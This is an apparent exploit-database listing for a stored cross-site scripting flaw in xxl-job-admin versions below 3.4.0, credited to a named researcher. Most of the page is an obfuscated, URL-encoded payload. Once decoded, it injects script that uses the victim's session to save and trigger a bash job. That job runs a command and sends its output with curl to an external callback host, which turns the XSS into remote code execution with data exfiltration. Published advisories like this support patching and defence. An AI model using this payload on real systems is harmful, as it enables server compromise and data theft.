## https://sploitus.com/exploit?id=PACKETSTORM:226019
## Description
# Summary
A stored Cross‑Site Scripting vulnerability exists in xxl-job-admin JobInfoController.java where the addressList parameter accepts unsanitized URL‑encoded JavaScript. The payload is stored and later executed in users’ browsers, lead unauthorized actions.
# Affected Products
```text
xxl-job < 3.4.0
```
# Impact
Cross Site Scripting vulnerability in xxl-job-admin < v.3.4.0 allows a remote attacker to execute arbitrary code via a crafted HTTP GET request containing a malicious script.
# Proof of Concept
https://github.com/user-attachments/assets/01d7d767-ae1d-4a71-9bab-fcf76e01525d
# Payload
```text
/jobinfo/trigger?id=294&executorParam=test&addressList=%3c%73%63%72%69%70%74%3e%66%65%74%63%68%28%27%2f%77%61%6c%6c%79%74%2d%6a%6f%62%2d%61%64%6d%69%6e%2f%6a%6f%62%63%6f%64%65%2f%73%61%76%65%3f%69%64%3d%32%39%34%26%67%6c%75%65%53%6f%75%72%63%65%3d%25%32%33%21%25%32%46%62%69%6e%25%32%46%62%61%73%68%25%30%41%69%64%2b%25%37%43%2b%63%75%72%6c%2b%2d%64%2b%25%34%30%2d%2b%68%74%74%70%25%33%41%25%32%46%25%32%46%71%69%63%38%62%72%36%64%36%6f%6d%32%6a%34%35%39%7a%6b%34%65%76%75%69%6d%6c%64%72%34%66%30%33%70%2e%6f%61%73%74%69%66%79%2e%63%6f%6d%2b%25%30%41%65%78%69%74%2b%30%25%30%41%26%67%6c%75%65%52%65%6d%61%72%6b%3d%31%32%33%34%35%27%2c%20%7b%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%63%72%65%64%65%6e%74%69%61%6c%73%3a%20%27%69%6e%63%6c%75%64%65%27%7d%29%3c%2f%73%63%72%69%70%74%3e%0a%3c%73%63%72%69%70%74%3e%66%65%74%63%68%28%27%2f%77%61%6c%6c%79%74%2d%6a%6f%62%2d%61%64%6d%69%6e%2f%6a%6f%62%69%6e%66%6f%2f%74%72%69%67%67%65%72%3f%69%64%3d%32%39%34%26%65%78%65%63%75%74%6f%72%50%61%72%61%6d%3d%74%65%73%74%26%61%64%64%72%65%73%73%4c%69%73%74%3d%27%2c%7b%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%63%72%65%64%65%6e%74%69%61%6c%73%3a%20%27%69%6e%63%6c%75%64%65%27%7d%29%3c%2f%73%63%72%69%70%74%3e://localhost:8090
```
Credits to
Ibrahim Sartawi